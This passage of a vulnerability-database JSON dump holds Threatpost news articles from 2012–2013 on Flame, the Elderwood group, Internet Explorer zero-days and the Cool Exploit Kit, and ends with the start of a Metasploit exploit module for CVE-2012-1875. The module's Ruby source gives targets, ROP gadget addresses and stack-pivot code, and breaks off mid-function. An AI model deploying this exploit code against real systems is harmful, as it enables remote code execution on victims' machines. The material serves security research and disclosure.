zero-day exploits and the that whomever had built the two tools had likely invested several million dollars in their development.\n\nClearly, this team was not playing around.\n\nThen there was the third group, the people who had direct experience with these kinds of attacks and tools, either on the offensive or defensive side. The kind of people who know what it takes to build a toolkit such as Stuxnet and what the use of five high-value vulnerabilities says about the makeup and resources of the team doing the development. These people mostly remained quiet about Stuxnet and Duqu, preferring to watch and learn.\n\nBut things changed rather quickly when word leaked out via a David Sanger piece in _The New York Times_ that the U.S. and Israel actually did build Stuxnet. Then researchers said that some of the [same components found in Stuxnet also are present in Flame](<https://threatpost.com/diving-flame-researchers-find-link-stuxnet-061112/>), and that the same attackers likely built both tools. Flame is actually the oldest of the three pieces of malware and has been in circulation for at least five years, meaning that the team behind them has been operating for a long time. \n\nSo what have we learned from all of this?\n\nFirst, we now know that there are a number of highly skilled offensive researchers and exploit writers out there, and not all of them work for [Dave Aitel](<http://www.immunityinc.com/>). Some of them work for the U.S. government and we have to assume that some of them work for the governments of Israel, the U.K., Russia, China and other countries, as well. \n\nSecond, we\u2019ve learned that at least one of these teams is committing serious resources to its offensive program. One of the tactics used by Flame to spread is the use of a [forged Microsoft certificate](<https://threatpost.com/flame-malware-uses-forged-microsoft-certificate-validate-components-060412/>) to set up a fake Windows Update proxy that installed the malware on victims\u2019 machines. The attackers were able to generate the forged certificate in part through the use of an MD5 hash collision, a difficult attack that\u2019s very expensive to execute, both in terms of money and resources. An [analysis of the hash collision by Alex Sotirov](<https://speakerdeck.com/u/asotirov/p/analyzing-the-md5-collision-in-flame>) of Trail of Bits, a researcher who helped develop the technique for this collision several years ago, showed that the team behind Flame probably spent between $200,000 and $2 million to generate the hash collision.\n\n\u201cUsing our forensic tool, we have indeed verified that a chosen-prefix collision attack against MD5 has been used for Flame. More interestingly, the results have shown that not our published chosen-prefix collision attack was used, but an entirely new and unknown variant. Therefore it is not unreasonable to assume that the particular chosen-prefix collision attack variant underlying Flame had already been in development before June 2009. This has led to our conclusion that the design of Flame is partly based on world-class cryptanalysis,\u201d [Marc Stevens](<http://www.cwi.nl/news/2012/cwi-cryptanalist-discovers-new-cryptographic-attack-variant-in-flame-spy-malware>), a Dutch academic cryptanalyst who worked on the 2008 hash collision with Sotirov, said in analysis of the Flame technique.\n\nIn other words, this is not a lark.\n\nAnd third, we have (hopefully) learned to take a little time to think and consider before making grand pronouncements about future attacks. Things are not always what they seem and sometimes the Internet is wrong.\n", "cvss3": {}, "published": "2012-06-15T19:46:56", "type": "threatpost", "title": "What Have We Learned: Flame Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-1875"], "modified": "2013-04-17T16:32:01", "id": "THREATPOST:8F0CF0787504194F36924266BB5F5678", "href": "https://threatpost.com/what-have-we-learned-flame-malware-061512/76701/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:48", "description": "Less than a week after Microsoft released a patch for a critical vulnerability in Internet Explorer, attack code has become publicly available in the form of a module for the [Metasploit Framework](<http://dev.metasploit.com/redmine/projects/framework/repository/revisions/6abb7bb987a11dbcda8eb611831bcb2ff65070e0?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+metasploit%2Fdevelopment+%28Metasploit+Development%29>). The bug is serious one that enables an attacker to bypass both ASLR and DEP, the two main anti-exploit technologies in IE, and run arbitrary code on the victim\u2019s machine.\n\nMicrosoft has warned customers to patch the IE vulnerability [CVE-2012-1875](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1875>) as soon as possible, as there have been active attacks going on against the flaw for several weeks.\n\n\u201cA remote code execution vulnerability exists in the way that Internet Explorer accesses an object that has been deleted. The vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user,\u201d [Microsoft said in its advisory](<http://technet.microsoft.com/en-us/security/bulletin/ms12-037>).\n\nSecurity researchers from McAfee discovered the vulnerability and found that attackers were using it in targeted attacks by the beginning of June. \n\n\u201cThe exploit works across all major Windows platforms, including Windows Vista and Windows 7. It leverages return-oriented programming (ROP) exploitation technology to bypass with data execution (DEP) and address space layout randomization (ASLR) protections, and hook-hopping evasion techniques to evade host-based IPS detections. It requires the victim\u2019s system to run an old Java virtual machine that came with a non-ASLR version of msvcr71.dll. If Java is not installed or there is no non-ASLR version of msvcr71.dll in the system, the exploit won\u2019t work, although it will cause IE to crash,\u201d [McAfee\u2019s Yichong Lin](<http://blogs.mcafee.com/mcafee-labs/active-zero-day-exploit-targets-internet-explorer-flaw>) said in an analysis of the attacks and bug.\n\nThe Internet Explorer exploit can be used against IE 8 and will give the attacker complete control of the compromised machine. If you haven\u2019t installed the patch yet, now\u2019s the time.\n", "cvss3": {}, "published": "2012-06-18T13:43:09", "type": "threatpost", "title": "Exploit Code Surfaces for CVE-2012-1875 Internet Explorer Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-1875", "CVE-2017-11882"], "modified": "2013-04-17T16:32:01", "id": "THREATPOST:C47E4314F4EEB30F0139DF3BC8B47E01", "href": "https://threatpost.com/exploit-code-surfaces-cve-2012-1875-internet-explorer-bug-061812/76702/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:38", "description": "Expect amped up pressure aimed in Microsoft\u2019s direction for a patch for the Internet Explorer zero day that surfaced last week, now that researchers at Exodus Intelligence reported today they have developed a bypass for the Fix It that Microsoft released as a temporary mitigation.\n\nTheir new exploit beat a fully patched Windows system running IE 8, the same version of the browser exploited by malware used in [watering hole attacks](<https://threatpost.com/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912/>) against a number of political and manufacturing websites, including the Council on Foreign Relations in the U.S., and Chinese human rights site Uygur Haber Ajanski.\n\nIE 6 and 7 also hold the same [use-after free memory vulnerability (CVE-2012-4792)](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4792>) but are currently not being exploited. Microsoft said the impact of the attacks is limited; IE 9 and 10 are not vulnerable, Microsoft said. Yesterday\u2019s [Patch Tuesday advisory](<https://threatpost.com/patch-ie-zero-day-wont-be-among-microsoft-security-updates-next-week-010313/>) previewing next Tuesday\u2019s batch of security updates did not include an IE patch.[![IE](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07073317/ie_holes_4.jpg)](<https://threatpost.com/researchers-bypass-microsoft-fix-it-ie-zero-day-010413/>)\n\nBrandon Edwards, VP of Intelligence at Exodus, said his firm\u2019s researchers looked at the Fix It to determine how much of the vulnerability it prevented. \u201cUsually, there are multiple paths one can take to trigger or exploit a vulnerability,\u201d Edwards said. \u201cThe Fix It did not prevent all those paths.\u201d\n\nThe Fix It, according to Microsoft, is an [appcompat shim](<http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx>) that modifies in memory a particular function to always return NULL, resulting in a safe crash of the browser rather than allowing for remote code execution.\n\n\u201cIt comes down to clearly understanding the root cause and ways the browser can get to the affected code,\u201d Edwards said. \u201cThe Fix It covered paths used by the exploit, but not all the ways the vulnerability can be reached. A full patch should eliminate all those possibilities.\u201d\n\nIn the meantime, a handful of political, social and human rights sites in the U.S., Russia, China and Hong Kong have been infected and serving malware, for weeks in some cases, that exploits the IE zero day; as of yesterday, the [Uygur website was still serving an exploit](<https://threatpost.com/ie-zero-day-watering-hole-attack-expands-handful-political-sites-010313/>), researcher and Metaspoloit contributor Eric Romang said.\n\nMicrosoft has been informed of the Exodus Intelligence exploit; researchers at Exodus said they will not disclose details of their exploit until Microsoft addresses the vulnerability.\n\nEarlier this week, Exodus developed what it called a more [advanced exploit of the IE vulnerability](<http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/>), which led them to look more closely at the Fix It. Unlike the original remote code injection exploit, this one does not require a heap spray to execute it. Peter Vreugdenhil said they were able to take advantage of IE8\u2019s support for HTML+TIME, which is no longer supported in more current versions of the browser. The researchers were able to create an array with pointers to strings they controlled, he said, enabling them to control system calls without a heap spray.\n\n\u201cI used some new and/or non-public techniques to get a reliable exploit that doesn\u2019t require heap spray, but all in all this bug can be exploited quite reliably,\u201d Vreugdenhil said in a blogpost.\n\nSymantec, meanwhile, yesterday attributed the attacks to the [Elderwood Project](<https://threatpost.com/elderwood-crew-tied-google-aurora-attack-targeting-defense-energy-finance-companies-090712/>), which has been responsible for a number of Microsoft zero days in 2012, including an attack in May against Amnesty International\u2019s Hong Kong site targeting [CVE-2012-1875](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1875>), and several defense-related sites discovered in September to be hosting malware targeting [CVE-2012-4969](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4969>). [Symantec then tied the latest IE zero- day to the group](<https://threatpost.com/researchers-bypass-microsoft-fix-it-ie-zero-day-010413/>) after concluding that the Council of Foreign Relations and Capstone Turbine Corp. websites were hosting the same malicious Shockwave file.\n\n\u201cAll the samples we identified include a function named HeapSpary. HeapSpary is a clear mistyping of Heap Spray, a common attack step used in vulnerability exploitation,\u201d Symantec wrote in a [blogpost](<https://threatpost.com/researchers-bypass-microsoft-fix-it-ie-zero-day-010413/>). \u201cIn addition to this commonality, there are many other symbols in common between the files.\u201d\n\nWatering hole attacks are carried out to monitor the victim\u2019s online activities. Attackers inject malicious files onto websites hoping to snare people with an interest in the site\u2019s focus. These types of attacks are not only effective, but are more economical than targeted attacks that start with a phishing email. Watering hole attacks require less advance legwork, yet are generally state-sponsored, intelligence-driven attacks.\n\nThe compromise of the CFR website, a foreign-policy resource for its notable public figure members and directors, brought the latest zero-day to light. The attack began as early as Dec. 7 and was still going on through the Christmas holiday. Attackers used a malicious Adobe Flash file called today.swf to launch a heap spray attack against IE, overrunning memory and enabling an attacker to remotely execute code on an infected computer. The Javascript hosting the exploit checks first to see if the Windows language is set to English, Chinese, Japanese, Korean or Russian before executing. It also uses cookies to ensure the attack is delivered only once.\n\nThe vulnerability, Microsoft said, occurs in the way IE accesses an object in memory that has been deleted or not properly allocated. Memory may be corrupted and allow an attacker to execute code with the user\u2019s privileges.\n\nResearchers at Avast Software yesterday reported infections on multiple sites worldwide. Researcher Jindrich Kubec said two of the sites were also hosting the binaries and configurations found in the September attacks Symantec tied to Elderwood. Those attacks were serving the PlugX and Poison Ivy RATs.\n", "cvss3": {}, "published": "2013-01-04T18:34:39", "type": "threatpost", "title": "Researchers Bypass Microsoft Fix It for IE Zero Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-1875", "CVE-2012-4792", "CVE-2012-4969"], "modified": "2013-05-10T15:44:38", "id": "THREATPOST:B4DB3D0667E712349DDF7EF229F2D543", "href": "https://threatpost.com/researchers-bypass-microsoft-fix-it-ie-zero-day-010413/77368/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:46", "description": "The unpatched [vulnerability in Internet Explorer\u2019s MSXML](<https://threatpost.com/microsoft-warns-xml-vulnerability-being-actively-exploited-061312/>) component that Microsoft warned users about earlier this month is being used in attacks that employ malicious Flash files. Researchers say that the attacks are taking the form of drive-by downloads launched from compromised legitimate sites.\n\nThe attack scenario that\u2019s being used is a familiar one. When users visit a legitimate site that\u2019s been compromised, the malicious code injected onto the site exploits the [CVE-2012-1889](<http://technet.microsoft.com/en-us/security/advisory/2719615>) vulnerability in Internet Explorer to install malware on the victim\u2019s machine. It\u2019s the classic drive-by download technique and it has proven to be effective for years, and it\u2019s even more effective when there\u2019s an unpatched flaw such as this available for use.\n\n\u201cJust like the exploit code used against CVE-2012-1875, this exploit also uses an embedded SWF (Flash) file. The SWF file is responsible for performing the heap spray and setting up the shellcode,\u201d Karthikeyan Kasiviswanathan of Symantec wrote in an analysis of the attacks.\n\nWhen Microsoft first warned users about the vulnerability last week, officials said that the bug already was being used in attacks in the wild. Google researchers, who originally found the vulnerability and disclosed it to Microsoft, said that they had seen attacks against the vulnerability that were using malicious Office documents to carry the payload.\n\nThe newer series of attacks is instead using the ever-popular malicious Flash file as a delivery mechanism for the attacker\u2019s shellcode.\n\n\u201cThe exploit also supports multiple versions of Windows and languages. The heap spray and shellcode are customized depending on the combination of the Windows version and languages,\u201d Kasiviswanathan said. \u201cWhen the vulnerability is triggered, the execution is transferred to the shellcode. The shellcode is designed to download an encrypted payload from a URL and save it to the Temporary Internet Files folder.\u201d\n\nIf you\u2019re running Internet Explorer, you should use the [Microsoft FixIt tool](<http://support.microsoft.com/kb/2719615>) for the vulnerability, which is a stop-gap until Microsoft has a full patch available. \n", "cvss3": {}, "published": "2012-06-22T14:03:58", "type": "threatpost", "title": "Attackers Targeting MSXML Flaw With Malicious Flash Files", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-1875", "CVE-2012-1889", "CVE-2017-11882"], "modified": "2013-04-17T16:31:59", "id": "THREATPOST:1B75EB23D874C5D85DA6FEAB65007B4E", "href": "https://threatpost.com/attackers-targeting-msxml-flaw-malicious-flash-files-062212/76726/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:18", "description": "**[![Elderwood](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07072737/symantecelderwood.jpg)](<https://threatpost.com/elderwood-crew-tied-google-aurora-attack-targeting-defense-energy-finance-companies-090712/>)UPDATE**\u2013The same team that attacked [Google in the Aurora campaign](<https://threatpost.com/aurora-attack-malware-components-may-be-four-years-old-012010/>) in 2009 is still active and has been conducting a long-term campaign targeting defense contractors, financial services companies, energy companies, human rights organizations and government agencies using a seemingly inexhaustible supply of zero day vulnerabilities. The crew is using a variety of techniques to go after its targets, most notably compromising legitimate Web sites frequented by employees of the targeted organizations and then delivering exploits for one or more of their stockpiled zero-day bugs, researchers say.\n\nThe team behind these operations appears to be in the top tier of professional attack teams, possessing the ability to do original research to find new vulnerabilities in popular applications such as Adobe Flash and Internet Explorer, and then write exploits for those flaws, as well. Researchers at Symantec have been tracking the group, which they\u2019ve dubbed the Elderwood gang, for some time, and have seen the crew using previously unknown vulnerabilities in rapid succession over the course of the last couple of years in attacks aimed at defense contractors, government agencies and other high-value targets.\n\nThe number of groups doing their own research and finding zero days and then writing exploits for them is virtually impossible to know, given the structure of the cybercrime underground, but it is thought to be a small number relative to the overall population of attackers. That kind of research takes time, money and high-level technical skills that many groups solely interested in stealing money just don\u2019t have.\n\n\u201cIn order to discover these vulnerabilities, a large undertaking would be required by the attackers to thoroughly reverse-engineer the compiled applications. This effort would be substantially reduced if they had access to source code. The vulnerabilities are used as needed, often within close succession of each other if exposure of any of the vulnerabilities is imminent,\u201d Gavin O\u2019Gorman and Geoff McDonald of Symantec wrote in a detailed [analysis of the Elderwood crew\u2019s tactics](<https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf>).\n\n\u201cThe scale of the attacks, in terms of the number of victims and the duration of the attacks, are another indication of the resources available to the attackers. Victims are attacked, not for petty crime or theft, but for the wholesale gathering of intelligence and intellectual property. The resources required to identify and acquire useful information\u2014let alone analyze that information\u2014could only be provided by a large criminal organization, attackers supported by a nation state, or a nation state itself.\u201d\n\nThe researchers said that this group is utilizing one technique, which they call a \u201cwatering hole\u201d attack, that involves waiting for the targets to come to them rather than going after the targeted organizations or employees directly. To accomplish this, the Elderwood gang identifies a Web site that\u2019s frequented by employees of organizations in the sector that they\u2019re targeting, say financial services. They then compromise that site, whether through SQL injection or some other common technique, and plant exploit code on some of the public pages of the site. They then wait for the targeted employees to hit the pages, at which point the exploit fires and ideally (for the attackers) compromises the victim\u2019s machine.\n\nThe idea is roughly the same as a typical drive-by download attack that uses SQL injection as its initial vector to compromise a site, but in this case the attacker is going after a specific site rather than a large volume of vulnerable sites and is looking for a specific subset of victims, as well. Researchers at [RSA Security also analyzed attacks of this kind](<http://blogs.rsa.com/will-gragido/lions-at-the-watering-hole-the-voho-affair/>) in July, and found that the attackers were installing a variant of Gh0stRAT, a well-known remote-access tool that\u2019s been used in targeted [attacks by Chinese groups](<https://threatpost.com/ghostnet-shows-extent-online-spying-033009/>) for several years.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07072734/joestewart1.jpg)Joe Stewart, director of malware research at Dell SecureWorks, has been following a series of attacks by groups loosely connected to the crew that Symantec is identifying as the Elderwood gang and said that there\u2019s no question about the group\u2019s capabilities.\n\n\u201cThey\u2019re definitely doing their own research, or paying someone for immediate access to it. They certainly have plenty of zero days they\u2019ve come out with,\u201d Stewart said. \n\nThis Elderwood group has used a number of zero days in the last couple of years as part of its attack campaigns, including the [CVE-2012-1535 Flash vulnerability](<https://threatpost.com/adobe-patches-critical-flash-bug-releases-massive-reader-update-081412/>) that Adobe patched last month and the [CVE-2012-1875 MSXML flaw](<https://threatpost.com/exploit-code-surfaces-cve-2012-1875-internet-explorer-bug-061812/>) in Internet Explorer that Microsoft fixed in June. The group will use exploits for these vulnerabilities both in Web-based attacks and in targeted spear-phishing email attacks. But in both cases, the goal is the theft of intellectual property.\n\n\u201cAlthough watering hole attacks have been known about since approximately March of 2011, the activity outlined in this report marks a substantial increase. Three zero-day exploits, CVE-2012-0779, CVE-2012-1875, and CVE-2012-1889 have all been used within a 30-day period to serve up back door Trojans from compromised websites,\u201d the paper says.\n\nThe connection to the attack on Google in late 2009, which was named Aurora at the time, comes both from some commonalities in the way that the attackers are obfuscating parts of their code, which also was seen in the Hydraq Trojan, the piece of malware used in the Google attack. \n\n\u201cWe believe the Hydraq attack and the recent attacks that exploit the vulnerabilities outlined above are linked,\u201d O\u2019Gorman and McDonald wrote.\n\n\u201cAdditional links joining the various exploits together included a shared command-and-control infrastructure. Trojans dropped by different exploits were connecting to the same servers to retrieve commands from the attackers. Some compromised websites used in the watering hole attacks had two different exploits injected into them one after the other. Yet another connection is the use of similar encryption in documents and malicious executables. A technique used to pass data to a SWF file was re-used in multiple attacks. Finally, the same family of Trojan was dropped from multiple different exploits,\u201d the researchers said.\n\nThe Elderwood team may have a custom platform set up to help take exploit code for a new vulnerability, drop it into a benign Word document or PDF and then bundle it with the Trojan payload to have the components for a new attack at hand as quickly as possible. The crew also has created a SWF file that is used in multiple attacks, with small changes, to help place their exploit code in the optimal part of memory.\n\n\u201cInstead of developing code to perform these tasks for each different exploit, the attackers have developed a common SWF file that is used solely to create the correct conditions in memory and accepts a parameter specifying where to download the Trojan. In some attacks, the parameter name was \u201cElderwood.\u201d The same SWF file was seen used when exploiting 3 different vulnerabilities (CVE-2012-0779, CVE-2012-1875, CVE-2012-1889). By using a common SWF file, the attackers can simply deploy a new trigger, that is, a zero-day exploit, and the SWF handles the rest of the work, retrieving and decoding the back door Trojan,\u201d the researchers said.\n\nThe Elderwood team also seems to have an uncanny ability to sense when one of the zero days it has been using is about to be disclosed publicly. It often will shift to using a new vulnerability shortly before one of its current favorites is exposed, suggesting the crew watches the developments in the underground and legitimate security communities closely.\n\n\u201cThe group seemingly has an unlimited supply of zero-day vulnerabilities. The vulnerabilities are used as needed, often within close succession of each other if exposure of the currently used vulnerability is imminent,\u201d Symantec\u2019s report says.\n\nStewart of Dell SecureWorks said that he hasn\u2019t seen the groups he follows droppng a specific exploit because a vulnerability is about to be patched. But he said the Elderwood gang likely is part of one of the two main attack groups based in China, with this one centered in Beijing and another based around Shanghai.\n\n\u201cThey\u2019re one of the two main actor groups we see and we base that assessment on the sharing of infrastructure and where it\u2019s located and some other details,\u201d he said. \u201cThe reason they use so many different types of malware is that they probably have people inside the groups that have certain preferences, things they like and they\u2019re comfortable with. They use Gh0st, Hydraq, whatever they need. They have a lot of malware. It speaks to a large number of actors. They\u2019re all getting marching orders from the same place, but it\u2019s not the exact same people hitting the keys.\u201d\n\nThis larger group of attackers has been active for years, well before the attack on Google became public in early 2010.\n\n\u201cThey were active well before [the Google attack]. I have samples from them from the 2006 to 2007 time frame and some that are similar and probably them as far back as 2003,\u201d Stewart said. \n\n\u201cThis is years of constant, dedicated, persistent attacks.\u201d\n\n_This story was updated on Sept. 7 to add comments from Joe Stewart._\n", "cvss3": {}, "published": "2012-09-07T14:41:30", "type": "threatpost", "title": "'Elderwood' Crew, Tied to Google Aurora Attack, Targeting Defense, Energy, Finance Companies", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0779", "CVE-2012-1535", "CVE-2012-1875", "CVE-2012-1889"], "modified": "2013-04-17T16:31:36", "id": "THREATPOST:8118BE47AC766B8F6DD708B119E33DFE", "href": "https://threatpost.com/elderwood-crew-tied-google-aurora-attack-targeting-defense-energy-finance-companies-090712/76987/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:49", "description": "You cannot accuse the keepers of the Cool Exploit Kit of not recognizing market trends. Given a rash of recent watering hole attacks and zero-day exploits built around Microsoft\u2019s Internet Explorer browser, it\u2019s no surprise that a 15-month-old IE exploit has been included in the crimeware package.\n\nMicrosoft [reported](<http://blogs.technet.com/b/mmpc/archive/2013/05/07/cve-2012-1876-recent-update-to-the-cool-exploit-kit-landing-page.aspx>) last night the inclusion of [CVE-2012-1876](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1876>) in Cool, a vulnerability in IE that was patched last June in [MS12-037](<http://technet.microsoft.com/en-us/security/bulletin/ms12-037>).\n\nThis is a remote code execution heap-based buffer overflow flaw that impacts IE 6-9. Researchers from VUPEN demonstrated a successful exploit during the 2012 Pwn2Own contest that was able to bypass ASLR and DEP data execution protections built into Window. VUPEN\u2019s exploit beat a fully patched version of IE 9 running on a Windows 7 machine.\n\n\u201cThis can be achieved by leaking an address of the mshtml.dll module, building a heap spray based on this address and triggering the vulnerability again to execute the payload,\u201d VUPEN said in a [blogpost](<http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php>) last July, adding that its researchers combined this exploit with another zero-day in order to bypass IE\u2019s Protected mode.\n\n\u201cAfter triggering the vulnerability for a memory leak to disclose interesting addresses, it is possible to trigger the same vulnerability once again to achieve code execution by overflowing the same buffer in memory with arbitrary values,\u201d VUPEN said.\n\nMicrosoft\u2019s Justin Kim said Cool is the only kit to carry the IE exploit.\n\n\u201cFor a while it seemed exploit kit writers were not too interested in this vulnerability,\u201d Kim said.\n\nThe IE exploit is not the only new addition to Cool. Microsoft said Adobe Reader and Flash exploits have also been added ([CVE-2012-0755](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0755>) and [CVE-2013-0634](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0634>), respectively). The IE attack, however, opens the spectrum of potential victims because of a return-oriented programming technique that allows it to identify the DLL a process is running on, and match a malicious payload to the corresponding DLL.\n\n\u201cThe exploit includes not only one but 18 different attack payloads, giving attackers the ability to leverage 18 different versions _ofmshtml.dll_. In the past, there was only one payload per exploit targeting one specific version of the module, usually XP system files or several other 3rd-party files that are without address space layout randomization (ASLR) protection enabled,\u201d Kim said. \u201cWith this enhancement in exploit stability, the exploit is capable of exploiting a larger population of victims, including those using Windows Vista and Windows 7.\u201d\n\nThe Cool Exploit Kit was first detected in October in a spate of attacks involving the Reveton ransomware. The [discovery of Cool](<http://malware.dontneedcoffee.com/2012/10/newcoolek.html>) happened after [French researcher Kafeine](<http://malware.dontneedcoffee.com/2012/11/cool-ek-hello-my-friend-cve-2012-5067.html>) discovered an exploit for a Windows vulnerability first exploited by Duqu. The same exploit ended up in the Blackhole Exploit Kit, leading experts to conclude the [same group was running both](<http://threatpost.com/cool-blackhole-exploit-kits-created-same-hacker-010913/>).\n\nAs for the Adobe-related additions to Cool, the most severe seems to be CVE-2013-0634 for Flash, which was [patched by Adobe in February](<http://threatpost.com/emergency-adobe-flash-player-patched-fix-pair-zero-days-020813/>). The exploit injects websites with malicious .SWF files targeting Firefox and Safari users. This is the same LadyBoyle attack used against targets in the aerospace industry signed with [digital certificates stolen from Asian gaming companies](<http://threatpost.com/stolen-winnti-certificates-used-watering-hole-attack-against-tibet-orphans-site-041213/>) as outline in the [Winnti research](<http://www.securelist.com/en/blog/208194218/Winnti_Stolen_Digital_Certificates_Used_in_Orphan_Tibetan_Refugee_Children_Caregivers_Attack>) done by Kaspersky Lab. Tibetan activists were also targets of these attacks as well.\n", "cvss3": {}, "published": "2013-05-08T11:00:45", "type": "threatpost", "title": "Cool Exploit Kit Includes Old Internet Explorer Exploit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0755", "CVE-2012-1876", "CVE-2012-5067", "CVE-2013-0634"], "modified": "2013-05-08T15:00:45", "id": "THREATPOST:0EF2611E64611F9EBB9DD054ABF7473B", "href": "https://threatpost.com/old-ie-attack-finds-its-way-into-cool-exploit-kit/100330/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2023-02-09T11:12:38", "description": "This module exploits a memory corruption flaw in Internet Explorer 8 when handling objects with the same ID property. At the moment this module targets IE8 over Windows XP SP3 and Windows 7. This module supports heap massaging as well as the heap spray method seen in the wild (Java msvcrt71.dll).\n", "cvss3": {}, "published": "2012-06-13T16:33:26", "type": "metasploit", "title": "MS12-037 Microsoft Internet Explorer Same ID Property Deleted Object Handling Memory Corruption", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1875"], "modified": "2022-02-16T23:22:40", "id": "MSF:EXPLOIT-WINDOWS-BROWSER-MS12_037_SAME_ID-", "href": "https://www.rapid7.com/db/modules/exploit/windows/browser/ms12_037_same_id/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS12-037 Microsoft Internet Explorer Same ID Property Deleted Object Handling Memory Corruption\",\n 'Description' => %q{\n This module exploits a memory corruption flaw in Internet Explorer 8 when\n handling objects with the same ID property. At the moment this module targets\n IE8 over Windows XP SP3 and Windows 7. This module supports heap massaging\n as well as the heap spray method seen in the wild (Java msvcrt71.dll).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Dark Son', # Vulnerability discovery\n 'Unknown', # Credited to both Qihoo 360 Security Center and Google, Inc. for Vulnerability discovery\n 'Yichong Lin', # Vulnerability discovery\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'MSB', 'MS12-037'],\n [ 'CVE', '2012-1875' ],\n [ 'OSVDB', '82865'],\n [ 'URL', 'http://labs.alienvault.com/labs/index.php/2012/ongoing-attacks-exploiting-cve-2012-1875/'],\n [ 'URL', 'https://twitter.com/binjo/status/212795802974830592' ], # Exploit found in the wild\n [ 'URL', 'https://www.rapid7.com/blog/post/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities']\n ],\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [\n 'IE 8 on Windows XP SP3 with msvcrt ROP',\n {\n 'Rop' => :msvcrt,\n 'RopOffset' => '0x5f4',\n 'Ret' => 0x77c15ed5 # xchg eax, esp # ret # from msvcrt.dll\n }\n ],\n [\n 'IE 8 on Windows XP SP3 with JRE ROP',\n {\n 'Rop' => :jre,\n 'RopOffset' => '0x5f4',\n 'Ret' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll\n }\n ],\n [\n 'IE 8 on Windows 7 SP1/Vista SP2 with JRE ROP',\n {\n 'Rop' => :jre,\n 'RopOffset' => '0x5f4',\n 'Ret' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll\n }\n ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2012-06-12',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n # If the user is already specified by the user, we'll just use that\n return target if target.name != 'Automatic'\n\n if agent =~ /NT 5\\.1/ and agent =~ /MSIE 8\\.0/\n # Windows XP SP3 + IE 8.0\n return targets[1]\n elsif agent =~ /NT 6\\.[01]/ and agent =~ /MSIE 8\\.0/\n # Windows 7 SP1 + IE 8.0\n # Vista SP2 + IE 8.0\n return targets[3]\n else\n return nil\n end\n end\n\n def ret(t)\n case t['Rop']\n when :msvcrt\n return [ 0x77c4ec01 ].pack(\"V\") # RETN (ROP NOP) # msvcrt.dll\n when :jre\n return [ 0x7c347f98 ].pack(\"V\") # RETN (ROP NOP) # msvcr71.dll\n end\n end\n\n def popret(t)\n case t['Rop']\n when :msvcrt\n return [ 0x77c4ec00 ].pack(\"V\") # POP EBP # RETN (ROP NOP) # msvcrt.dll\n when :jre\n return [ 0x7c376541 ].pack(\"V\") # POP EBP # RETN (ROP NOP) # msvcr71.dll\n end\n end\n\n def get_rop_chain(t)\n pivot = ret(t) * 27\n pivot << popret(t)\n pivot << [t.ret].pack(\"V\") # stackpivot\n\n case 